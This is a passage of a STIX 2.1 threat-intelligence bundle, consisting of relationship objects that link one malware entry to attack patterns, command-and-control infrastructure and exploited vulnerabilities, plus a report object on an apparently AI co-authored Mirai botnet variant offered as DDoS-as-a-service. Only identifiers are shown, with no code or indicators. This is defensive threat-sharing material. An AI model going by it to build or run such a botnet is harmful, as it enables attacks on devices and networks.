"created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948929Z", "modified": "2026-06-16T16:01:05.948929Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1bf27ad6-8e5a-5523-8780-b4543c764e8d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949043Z", "modified": "2026-06-16T16:01:05.949043Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4c7dd529-24c9-53f2-b52a-9a732815cdca", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.9492Z", "modified": "2026-06-16T16:01:05.9492Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--cd2f26dd-b598-5ce6-ade1-bc5ff8c06177", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949328Z", "modified": "2026-06-16T16:01:05.949328Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8bf9dd93-eb36-57e7-913b-523bc2a4ff3a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949454Z", "modified": "2026-06-16T16:01:05.949454Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c047e249-4c36-5892-a8a5-a3f4b1b300c8", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949584Z", "modified": "2026-06-16T16:01:05.949584Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--044d908c-7a6e-5cbc-a5a4-cd5882a1a10d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949682Z", "modified": "2026-06-16T16:01:05.949682Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1bfd09d2-b356-52b1-ad03-75671e09d268", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949797Z", "modified": "2026-06-16T16:01:05.949797Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b0e8d224-50dd-5bae-bb10-6193e23eb300", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949892Z", "modified": "2026-06-16T16:01:05.949892Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1873ef6c-fa91-5fcd-8a4b-d76e4479c2d0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.949986Z", "modified": "2026-06-16T16:01:05.949986Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2ebf69b1-716e-5ab6-bc61-811e3a176f22", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.950091Z", "modified": "2026-06-16T16:01:05.950091Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--95236636-c3b0-5635-9b03-e2931fc325c5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.95019Z", "modified": "2026-06-16T16:01:05.95019Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9b05460a-eb70-590e-b89e-0b3dd4c8810e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.950296Z", "modified": "2026-06-16T16:01:05.950296Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c2a3b153-d479-50c3-a3c4-aedec6c47588", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.95039Z", "modified": "2026-06-16T16:01:05.95039Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--68b8cbf4-452a-5bcd-80c7-02e1f8a388a3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.950485Z", "modified": "2026-06-16T16:01:05.950485Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--075ef898-4f98-5e06-a47b-cb9efc6f5c8d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.950585Z", "modified": "2026-06-16T16:01:05.950585Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--408b4ac7-340a-5ce9-966c-06be6584c56a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.950682Z", "modified": "2026-06-16T16:01:05.950682Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--36f7fae4-0bd1-538c-af82-9f8b3673513f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.950776Z", "modified": "2026-06-16T16:01:05.950776Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b8d8d115-bf93-5b54-8d22-49b8fe7fff2e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.95087Z", "modified": "2026-06-16T16:01:05.95087Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--74f99078-79a2-504a-9ccf-d4cea89b9ecb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.950965Z", "modified": "2026-06-16T16:01:05.950965Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6990b43a-03e0-5cbb-a415-32f81fc69e66", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.95106Z", "modified": "2026-06-16T16:01:05.95106Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--5cb71618-611f-5ed0-a966-0613c403d4b9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.951161Z", "modified": "2026-06-16T16:01:05.951161Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a1513bb9-d250-58b0-b96a-9a3ef290fabb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.951283Z", "modified": "2026-06-16T16:01:05.951283Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--383b219e-8093-5619-96da-46177ca185a1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.951377Z", "modified": "2026-06-16T16:01:05.951377Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--50a229d2-c687-5c46-a427-029ff6c279d4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.951473Z", "modified": "2026-06-16T16:01:05.951473Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--446be04b-31b1-55b1-b9e7-1df5920a85ce", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.951571Z", "modified": "2026-06-16T16:01:05.951571Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e33da502-4afa-52b7-940f-fa18c809bb0f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.951813Z", "modified": "2026-06-16T16:01:05.951813Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--09370dd8-307e-58b3-8860-d6a6a1767aca", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.952022Z", "modified": "2026-06-16T16:01:05.952022Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--183b6ba9-595b-5edb-8a61-a74465afce0f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.95217Z", "modified": "2026-06-16T16:01:05.95217Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b8ccbab5-46c1-533d-81ec-bc4b7f148181", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.952274Z", "modified": "2026-06-16T16:01:05.952274Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--23749f7b-1a57-5439-b491-28f824585aca", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.952395Z", "modified": "2026-06-16T16:01:05.952395Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--774404e2-f294-5ce1-9c27-694fb4afedf6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.952495Z", "modified": "2026-06-16T16:01:05.952495Z", "relationship_type": "communicates-with", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c1ca78b8-85bd-57bb-9572-babdd0756f0e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.952603Z", "modified": "2026-06-16T16:01:05.952603Z", "relationship_type": "exploits", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "vulnerability--33d26914-f594-5da5-a6e5-24b04ab9a05c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1e06aa4a-8e7a-51d6-abed-0c2733201dca", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.952703Z", "modified": "2026-06-16T16:01:05.952703Z", "relationship_type": "exploits", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "vulnerability--a6691a02-8776-5d2e-b9b0-50d95ffd1dce", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6b8fcef0-5777-55dc-85a8-cca2a790a37e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.9528Z", "modified": "2026-06-16T16:01:05.9528Z", "relationship_type": "exploits", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "vulnerability--4d56e7a3-38a5-5c89-a858-26018e1d0119", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "report", "spec_version": "2.1", "id": "report--d6a3df6a-be77-50bd-8c19-3b3a9455ec93", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:06.060791Z", "modified": "2026-06-16T16:01:06.060791Z", "name": "Rovodev AI Co-Authored Mirai Variant + Matrix C2 Framework \u2014 UTA-2026-014 (Pandora 11-Arch IoT Botnet + DDoS-as-a-Service)", "report_types": [ "threat-report" ], "published": "2026-05-26T00:00:00Z", "object_refs": [ "ipv4-addr--63b868ea-bd7e-5ee1-ae42-c5a1a37365d9", "indicator--32bf839a-9a7a-5a3f-816e-5d26483fa081", "ipv4-addr--fbd27a38-0fd5-5dc3-b15c-c1d5b869ac64", "indicator--768f0cb9-19e4-5bda-9830-8d87db5c607d", "ipv4-addr--2b4c9db3-4296-5b9c-9bdb-6d0a701a2e47", "indicator--cdf8c0d6-6aa3-532e-8abf-bb23054c5f1d", "ipv4-addr--47ce2a5d-55b8-5c44-8768-76f91fa3d98d", "indicator--b4313750-aee2-5fc7-92a7-1a89e3d1dd2f", "ipv4-addr--f4e4db95-eb2c-5575-9345-096289d08e45", "indicator--8737e33a-5b28-547f-baaf-be90b91aa2f8", "ipv4-addr--318196f3-8d54-54ad-b32f-bd9e9588bc55", "indicator--5722181f-9fb4-51ae-8ba4-a415b9f0e834", "url--28537cfa-00fe-5b54-a891-ab7eefd343fb", "indicator--ba38d13b-6806-5a58-aaaa-41d9be22ba5f", "url--6db1f023-0e44-50c4-801c-bd64d71b3273", "indicator--b128780c-e2b5-5998-9956-641264f20055", "file--98889a40-f40e-5c33-91af-d13882f6ac89", "indicator--45e08149-7ac9-5e5f-85aa-cd33ce4b0e0e", "file--762a313e-a228-560c-9a62-f6597b056e5e", "indicator--8f837c37-150c-5e17-b85e-27d954ee8430", "file--132c719a-7c8e-56cc-8e8c-f5f02b17ea22", "indicator--ccea46d2-2993-52e4-a4b7-47fd822f3f79", "file--0698b00c-ae59-5c97-bd0a-9040acab8bd1", "indicator--668538c9-ab04-5b1e-a503-3e2dfd859f97", "file--a69815c0-60d9-5e4e-86a7-3d70f7145ebc", "indicator--12ab0f05-aa85-5c82-9ebe-87fad88050eb", "file--cfbc6618-1aa4-518e-94df-4993df73d199", "indicator--f3018267-421c-5c53-8002-307a664afe58", "file--174fb163-dc0d-5adc-b54b-d3a84ee0b282", "indicator--0c7f700f-207c-52eb-b9a4-1da7ab6c0cea", "file--5c3818af-e7b7-5d3c-a09f-6a16dd39c114", "indicator--e1b7710d-03f6-5fb4-8823-60fdacc4f3a8", "file--704ae4bc-eec5-5e2e-83da-d8fb37c2692c", "indicator--52e696b3-871b-57f0-b29e-03a290c61dbb", "file--d45efa64-d796-5cf2-a0fb-17705b41210f", "indicator--efc3a16c-5802-58c5-a7c0-4b8d08357547", "file--4b7deeaa-b11f-5a56-8c58-9088a1b56d86", "indicator--12e844b5-16cf-584c-8e52-c26622bef2d6", "file--eea3dab9-f661-5d70-bd03-db3309f3a471", "indicator--752fd330-6706-51cd-9388-18f058ef0f74", "file--9948ceac-2ec0-5222-808b-b66a34fd34b2", "indicator--ff494eb7-7965-5ae9-8ae6-7727f8d9d55a", "file--0df884dc-a3af-5e90-b79c-af41771f1b02", "indicator--67d16aa4-60f8-5825-bf58-e1ec29eafb0b", "file--9de686ac-2281-5070-be47-fc29d8d9beb5", "indicator--251d96df-50fa-59f5-8c38-9d118063ab2b", "file--e3414d7f-542e-53c4-8ca1-feb5acba727f", "indicator--f0e65d04-21b2-5c35-b6bd-03929fa608ca", "file--9b893307-2ba6-5ccd-bbeb-bbd103a6fc82", "indicator--cf770c04-8077-5831-8a34-3856e3734c20", "file--0701207e-31fd-5783-a23a-59f7e75d8793", "file--d7de020a-c1ab-5af1-9b6c-e3cfdc315bda", "file--86028aae-0767-5379-b0b4-a9148ad4a999", "file--691f35b6-e71a-5b39-8fd9-882d06e0136e", "file--5fc4378e-5351-505d-8233-aec781882322", "file--259b6ec4-131a-5ee3-8688-71817d9692be", "file--5e3ca335-fe0a-5d53-87da-4a5e62ac878e", "file--52774875-bcd6-58c8-82e9-a92083e0304a", "file--c79dc0b0-d501-58c4-8fc4-bb0636c34ca0", "indicator--bb4bd80d-2ce8-5d20-91ed-d048c70ce2f4", "file--51e64544-133c-51fc-8d7a-6c8136537ce1", "file--c48831a8-cb7b-5527-817b-c611b6d02bba", "indicator--8d7a6416-59fa-54ff-b023-7be84e2fa3fb", "file--a20170d6-e10b-543e-a0f3-26b0e0cd7363", "indicator--7f1f011b-a5e3-5390-9197-47506c84c148", "file--03b968a6-e8ad-547f-9757-3c400db43acd", "file--bbc48912-7570-5911-b389-1bebcb1eff7c", "file--3d9c4059-7528-5bff-97f2-0ba5446040c8", "file--be2bdaea-623c-519b-981d-a4ba4ef3838e", "indicator--eae8b01b-12e2-53d0-8086-463ccacf210d", "file--b6f2794d-55f6-5a80-bbce-e4b2fa972e8c", "indicator--6dd72edc-d426-59e0-bfa6-786fd09c7066", "file--71982346-9bae-5883-ba88-6d27c3ba51e8", "indicator--3caf9842-74d2-54be-830e-279641463f85", "indicator--b5edd3d6-548e-50e6-b560-01578db3b113", "indicator--1db870aa-d146-5e1a-ac3e-0e2278763572", "indicator--cc3f380d-3be9-5c85-a6a2-0e61e9947461", "indicator--11971737-7145-51a3-aa91-758c1786accc", "indicator--1de8572f-2eec-5f52-94e0-72c0699dcc66", "indicator--0ca74fef-4a2d-5938-b239-55e83dcf00b9", "indicator--0ca2f1e7-7096-5c1e-a459-8d519800b3f7", "indicator--ea46ebd6-e86b-5bc7-9816-26048fd4b8a2", "indicator--42a898b0-8b4d-5135-9be9-4d0d7add2ba5", "indicator--316051bb-937d-5a1e-ab0d-0c575e5e14e6", "indicator--7498262d-91f9-5ca3-8c7d-e863bc95573c", "indicator--5f27cbd1-b0e1-5a47-8bbd-eeda913d66b6", "indicator--9c3b5e98-ab10-510b-801f-873c03487eaf", "indicator--4da6c2a5-f0df-59b0-9856-94942d275229", "indicator--49dc64d0-0e5d-5340-9b00-7a7e87c4a816", "indicator--11b20550-5ce3-5ea2-b462-94164521783c", "indicator--baa71619-f784-57db-80ae-d0ea3922f656", "indicator--434b0ca1-c98e-5c26-86f3-73d6788c4dfe", "indicator--331713cc-10fb-543f-9cb7-45b805110306", "indicator--f0f627f2-43a3-511b-b5ac-7e53f9f64505", "indicator--25ca63e0-4b15-5dea-aa67-bf46f23f0b62", "indicator--63359c8f-c8a9-575c-b159-d3aadf6aa65a", "indicator--32e771d5-8281-5980-ae1e-092312421772", "indicator--fe382a31-3d9d-5103-9806-6fc1f9f9569e", "indicator--8a730355-b58a-54de-a0f1-f4f9c0256984", "indicator--9a188779-7721-514c-b204-a997f9f1aa58", "indicator--493bd6bd-20eb-566b-9801-42d47f6a129f", "indicator--4bd77b51-b3db-5d34-8a6f-6f2c7e5798fb", "indicator--b85c50c9-5db6-55e8-9fde-73c5581b40d8", "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "malware--fd1a5be3-71f7-5c50-abe9-e8a8dfb4e4f4", "malware--00325578-54c9-57e3-a535-57db0340d1e6", "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "tool--2bdd9e17-1bc2-5b20-9c9e-400008f89e39", "tool--699024e5-ddbb-5d31-ab4e-824885ce72f2", "tool--43a84cf5-99b5-5dbe-a46b-8d8d27ac53cc", "tool--15c54f25-b627-5184-90fe-9842800f2d97", "tool--1cc70a78-f3d6-5865-9865-3a435d95ccf5", "tool--12cf3313-c71e-518a-b3e0-09b465a1957a", "tool--6915be9d-0954-5531-83b3-9fe82df05038", "tool--03be7702-b2db-5525-8ea7-c0fab3e9a166", "tool--4f9b6f95-675f-5f47-86cd-0b0fc145ff10", "tool--71b0bc4d-a8fb-5daa-ba54-6ee690701d21", "tool--ac7e057e-c3ac-5507-8842-bf16632d42ea", "tool--cf7a60ed-7084-5e8b-8d1a-e7a519c20e75", "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", 